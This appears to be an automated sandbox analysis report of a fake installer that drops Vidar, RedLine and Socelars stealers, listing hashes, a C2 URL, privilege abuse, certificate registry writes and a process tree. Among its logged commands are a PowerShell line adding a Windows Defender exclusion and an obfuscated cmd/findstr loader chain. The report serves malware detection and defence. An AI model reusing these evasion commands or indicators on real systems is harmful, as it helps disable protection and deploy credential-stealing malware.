Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
linux_amd64
Analysis
-
max time kernel
55s -
max time network
1816s -
platform
windows7_x64 -
resource
win7-de -
submitted
11-09-2021 09:47
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
Behavioral task
behavioral11
Sample
setup_x86_x64_install.exe
Resource
ubuntu-amd64
General
-
Target
setup_x86_x64_install.exe
-
Size
4.4MB
-
MD5
65eed0fdbee8b81c1b9118f86700c6fd
-
SHA1
fcca1e88a99e2f20403e963b798e3f68f58d638d
-
SHA256
3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d
-
SHA512
f4c88eea9b410ea353ca9dc10c97dcfb360f9ef115d17eca1f12a4a702bc0b787cf48bfb2e6d993b8ad64ff4a0f9a2165d70eb1ae7b48652a3f5d8862543b3ac
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Signatures
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2668 2912 rundll32.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2088 2912 rundll32.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3076 2912 rundll32.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3116 2912 rundll32.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3140 2912 rundll32.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3164 2912 rundll32.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3844 2912 rUNdlL32.eXe 90 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral4/memory/1988-216-0x0000000002E10000-0x0000000002E2F000-memory.dmp family_redline behavioral4/memory/2900-346-0x000000000041C5E6-mapping.dmp family_redline -
Socelars Payload 5 IoCs
resource yara_rule behavioral4/files/0x0001000000012f06-154.dat family_socelars behavioral4/files/0x0001000000012f06-136.dat family_socelars behavioral4/files/0x0001000000012f06-115.dat family_socelars behavioral4/files/0x0001000000012f06-169.dat family_socelars behavioral4/files/0x0001000000012f06-168.dat family_socelars -
Vidar Stealer 1 IoCs
resource yara_rule behavioral4/memory/1592-221-0x0000000000400000-0x00000000021B7000-memory.dmp family_vidar -
resource yara_rule behavioral4/files/0x0001000000012f08-69.dat aspack_v212_v242 behavioral4/files/0x0001000000012f08-70.dat aspack_v212_v242 behavioral4/files/0x0001000000012f07-71.dat aspack_v212_v242 behavioral4/files/0x0001000000012f07-72.dat aspack_v212_v242 behavioral4/files/0x0001000000012f0a-75.dat aspack_v212_v242 behavioral4/files/0x0001000000012f0a-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
pid Process 1684 setup_installer.exe 1100 setup_install.exe 824 Fri191454c4b4.exe 1620 Fri192f077acf656dd.exe 1676 Fri192b9eeaa03b.exe 2000 Fri195cd4dbfdf37897.exe 2028 Fri19d30056588.exe 796 Fri192c305b4a.exe 1592 Fri192902b3c24.exe 1040 Fri19b9b73e83c948b1d.exe 1988 Fri19927b4fe38a9d1.exe 1728 Fri1921f7a9d3.exe 744 Fri192b9eeaa03b.tmp 1788 Fri195cd4dbfdf37897.tmp 2420 MsiExec.exe 2444 1.exe 2500 2.exe 2540 3.exe 2584 7252722.exe 2620 5.exe 2656 6.exe 2692 7.exe 2704 46807GHF____.exe 2776 BearVpn 3.exe 1604 Setup.exe -
Loads dropped DLL 64 IoCs
pid Process 1084 setup_x86_x64_install.exe 1684 setup_installer.exe 1684 setup_installer.exe 1684 setup_installer.exe 1684 setup_installer.exe 1684 setup_installer.exe 1684 setup_installer.exe 1100 setup_install.exe 1100 setup_install.exe 1100 setup_install.exe 1100 setup_install.exe 1100 setup_install.exe 1100 setup_install.exe 1100 setup_install.exe 1100 setup_install.exe 620 cmd.exe 1496 cmd.exe 540 cmd.exe 1912 cmd.exe 1724 cmd.exe 1176 cmd.exe 1708 cmd.exe 1708 cmd.exe 832 cmd.exe 832 cmd.exe 2028 Fri19d30056588.exe 2028 Fri19d30056588.exe 1300 cmd.exe 1620 Fri192f077acf656dd.exe 1620 Fri192f077acf656dd.exe 788 cmd.exe 788 cmd.exe 1676 Fri192b9eeaa03b.exe 1676 Fri192b9eeaa03b.exe 1592 Fri192902b3c24.exe 1592 Fri192902b3c24.exe 2000 Fri195cd4dbfdf37897.exe 2000 Fri195cd4dbfdf37897.exe 1040 Fri19b9b73e83c948b1d.exe 1040 Fri19b9b73e83c948b1d.exe 1988 Fri19927b4fe38a9d1.exe 1988 Fri19927b4fe38a9d1.exe 1676 Fri192b9eeaa03b.exe 2000 Fri195cd4dbfdf37897.exe 1728 Fri1921f7a9d3.exe 1728 Fri1921f7a9d3.exe 744 Fri192b9eeaa03b.tmp 744 Fri192b9eeaa03b.tmp 744 Fri192b9eeaa03b.tmp 1788 Fri195cd4dbfdf37897.tmp 1788 Fri195cd4dbfdf37897.tmp 1788 Fri195cd4dbfdf37897.tmp 1620 Fri192f077acf656dd.exe 1620 Fri192f077acf656dd.exe 1620 Fri192f077acf656dd.exe 1620 Fri192f077acf656dd.exe 1620 Fri192f077acf656dd.exe 1620 Fri192f077acf656dd.exe 1620 Fri192f077acf656dd.exe 1620 Fri192f077acf656dd.exe 744 Fri192b9eeaa03b.tmp 1620 Fri192f077acf656dd.exe 2776 BearVpn 3.exe 2776 BearVpn 3.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ipinfo.io 12 ipinfo.io 124 ip-api.com 229 freegeoip.app 231 freegeoip.app 232 freegeoip.app 502 ipinfo.io 132 ipinfo.io 137 ipinfo.io 234 freegeoip.app -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 892 2500 WerFault.exe 63 1720 1592 WerFault.exe 49 2036 2720 WerFault.exe 96 3664 2024 WerFault.exe 77 2040 3020 WerFault.exe 106 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3516 schtasks.exe 9180 schtasks.exe 3836 schtasks.exe 2928 schtasks.exe -
Kills process with taskkill 5 IoCs
pid Process 2700 taskkill.exe 2008 taskkill.exe 2060 taskkill.exe 3076 taskkill.exe 3832 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e210f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Fri195cd4dbfdf37897.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Fri19d30056588.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Fri19d30056588.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C Fri195cd4dbfdf37897.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Fri195cd4dbfdf37897.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Fri195cd4dbfdf37897.tmp -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4008 PING.EXE -
Script User-Agent 9 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 39 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 40 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 51 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 134 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 37 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 503 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeCreateTokenPrivilege 2028 Fri19d30056588.exe Token: SeAssignPrimaryTokenPrivilege 2028 Fri19d30056588.exe Token: SeLockMemoryPrivilege 2028 Fri19d30056588.exe Token: SeIncreaseQuotaPrivilege 2028 Fri19d30056588.exe Token: SeMachineAccountPrivilege 2028 Fri19d30056588.exe Token: SeTcbPrivilege 2028 Fri19d30056588.exe Token: SeSecurityPrivilege 2028 Fri19d30056588.exe Token: SeTakeOwnershipPrivilege 2028 Fri19d30056588.exe Token: SeLoadDriverPrivilege 2028 Fri19d30056588.exe Token: SeSystemProfilePrivilege 2028 Fri19d30056588.exe Token: SeSystemtimePrivilege 2028 Fri19d30056588.exe Token: SeProfSingleProcessPrivilege 2028 Fri19d30056588.exe Token: SeIncBasePriorityPrivilege 2028 Fri19d30056588.exe Token: SeCreatePagefilePrivilege 2028 Fri19d30056588.exe Token: SeCreatePermanentPrivilege 2028 Fri19d30056588.exe Token: SeBackupPrivilege 2028 Fri19d30056588.exe Token: SeRestorePrivilege 2028 Fri19d30056588.exe Token: SeShutdownPrivilege 2028 Fri19d30056588.exe Token: SeDebugPrivilege 2028 Fri19d30056588.exe Token: SeAuditPrivilege 2028 Fri19d30056588.exe Token: SeSystemEnvironmentPrivilege 2028 Fri19d30056588.exe Token: SeChangeNotifyPrivilege 2028 Fri19d30056588.exe Token: SeRemoteShutdownPrivilege 2028 Fri19d30056588.exe Token: SeUndockPrivilege 2028 Fri19d30056588.exe Token: SeSyncAgentPrivilege 2028 Fri19d30056588.exe Token: SeEnableDelegationPrivilege 2028 Fri19d30056588.exe Token: SeManageVolumePrivilege 2028 Fri19d30056588.exe Token: SeImpersonatePrivilege 2028 Fri19d30056588.exe Token: SeCreateGlobalPrivilege 2028 Fri19d30056588.exe Token: 31 2028 Fri19d30056588.exe Token: 32 2028 Fri19d30056588.exe Token: 33 2028 Fri19d30056588.exe Token: 34 2028 Fri19d30056588.exe Token: 35 2028 Fri19d30056588.exe Token: SeDebugPrivilege 824 Fri191454c4b4.exe Token: SeDebugPrivilege 2692 7.exe Token: SeDebugPrivilege 2540 3.exe Token: SeDebugPrivilege 2620 5.exe Token: SeDebugPrivilege 2444 1.exe Token: SeDebugPrivilege 2656 6.exe Token: SeDebugPrivilege 2584 7252722.exe Token: SeDebugPrivilege 2500 2.exe Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 2776 BearVpn 3.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1788 Fri195cd4dbfdf37897.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1084 wrote to memory of 1684 1084 setup_x86_x64_install.exe 27 PID 1084 wrote to memory of 1684 1084 setup_x86_x64_install.exe 27 PID 1084 wrote to memory of 1684 1084 setup_x86_x64_install.exe 27 PID 1084 wrote to memory of 1684 1084 setup_x86_x64_install.exe 27 PID 1084 wrote to memory of 1684 1084 setup_x86_x64_install.exe 27 PID 1084 wrote to memory of 1684 1084 setup_x86_x64_install.exe 27 PID 1084 wrote to memory of 1684 1084 setup_x86_x64_install.exe 27 PID 1684 wrote to memory of 1100 1684 setup_installer.exe 29 PID 1684 wrote to memory of 1100 1684 setup_installer.exe 29 PID 1684 wrote to memory of 1100 1684 setup_installer.exe 29 PID 1684 wrote to memory of 1100 1684 setup_installer.exe 29 PID 1684 wrote to memory of 1100 1684 setup_installer.exe 29 PID 1684 wrote to memory of 1100 1684 setup_installer.exe 29 PID 1684 wrote to memory of 1100 1684 setup_installer.exe 29 PID 1100 wrote to memory of 1200 1100 setup_install.exe 33 PID 1100 wrote to memory of 1200 1100 setup_install.exe 33 PID 1100 wrote to memory of 1200 1100 setup_install.exe 33 PID 1100 wrote to memory of 1200 1100 setup_install.exe 33 PID 1100 wrote to memory of 1200 1100 setup_install.exe 33 PID 1100 wrote to memory of 1200 1100 setup_install.exe 33 PID 1100 wrote to memory of 1200 1100 setup_install.exe 33 PID 1100 wrote to memory of 1176 1100 setup_install.exe 34 PID 1100 wrote to memory of 1176 1100 setup_install.exe 34 PID 1100 wrote to memory of 1176 1100 setup_install.exe 34 PID 1100 wrote to memory of 1176 1100 setup_install.exe 34 PID 1100 wrote to memory of 1176 1100 setup_install.exe 34 PID 1100 wrote to memory of 1176 1100 setup_install.exe 34 PID 1100 wrote to memory of 1176 1100 setup_install.exe 34 PID 1100 wrote to memory of 1496 1100 setup_install.exe 35 PID 1100 wrote to memory of 1496 1100 setup_install.exe 35 PID 1100 wrote to memory of 1496 1100 setup_install.exe 35 PID 1100 wrote to memory of 1496 1100 setup_install.exe 35 PID 1100 wrote to memory of 1496 1100 setup_install.exe 35 PID 1100 wrote to memory of 1496 1100 setup_install.exe 35 PID 1100 wrote to memory of 1496 1100 setup_install.exe 35 PID 1100 wrote to memory of 620 1100 setup_install.exe 36 PID 1100 wrote to memory of 620 1100 setup_install.exe 36 PID 1100 wrote to memory of 620 1100 setup_install.exe 36 PID 1100 wrote to memory of 620 1100 setup_install.exe 36 PID 1100 wrote to memory of 620 1100 setup_install.exe 36 PID 1100 wrote to memory of 620 1100 setup_install.exe 36 PID 1100 wrote to memory of 620 1100 setup_install.exe 36 PID 1100 wrote to memory of 540 1100 setup_install.exe 37 PID 1100 wrote to memory of 540 1100 setup_install.exe 37 PID 1100 wrote to memory of 540 1100 setup_install.exe 37 PID 1100 wrote to memory of 540 1100 setup_install.exe 37 PID 1100 wrote to memory of 540 1100 setup_install.exe 37 PID 1100 wrote to memory of 540 1100 setup_install.exe 37 PID 1100 wrote to memory of 540 1100 setup_install.exe 37 PID 1200 wrote to memory of 1380 1200 cmd.exe 38 PID 1200 wrote to memory of 1380 1200 cmd.exe 38 PID 1200 wrote to memory of 1380 1200 cmd.exe 38 PID 1200 wrote to memory of 1380 1200 cmd.exe 38 PID 1200 wrote to memory of 1380 1200 cmd.exe 38 PID 1200 wrote to memory of 1380 1200 cmd.exe 38 PID 1200 wrote to memory of 1380 1200 cmd.exe 38 PID 1100 wrote to memory of 832 1100 setup_install.exe 39 PID 1100 wrote to memory of 832 1100 setup_install.exe 39 PID 1100 wrote to memory of 832 1100 setup_install.exe 39 PID 1100 wrote to memory of 832 1100 setup_install.exe 39 PID 1100 wrote to memory of 832 1100 setup_install.exe 39 PID 1100 wrote to memory of 832 1100 setup_install.exe 39 PID 1100 wrote to memory of 832 1100 setup_install.exe 39 PID 620 wrote to memory of 824 620 cmd.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192c305b4a.exe4⤵
- Loads dropped DLL
PID:1176 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri192c305b4a.exeFri192c305b4a.exe5⤵
- Executes dropped EXE
PID:796 -
C:\Users\Admin\AppData\Local\Temp\tmp3B4C_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp3B4C_tmp.exe"6⤵PID:3788
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe7⤵PID:3888
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Attesa.wmv7⤵PID:3896
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:3952
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv9⤵PID:1772
-
-
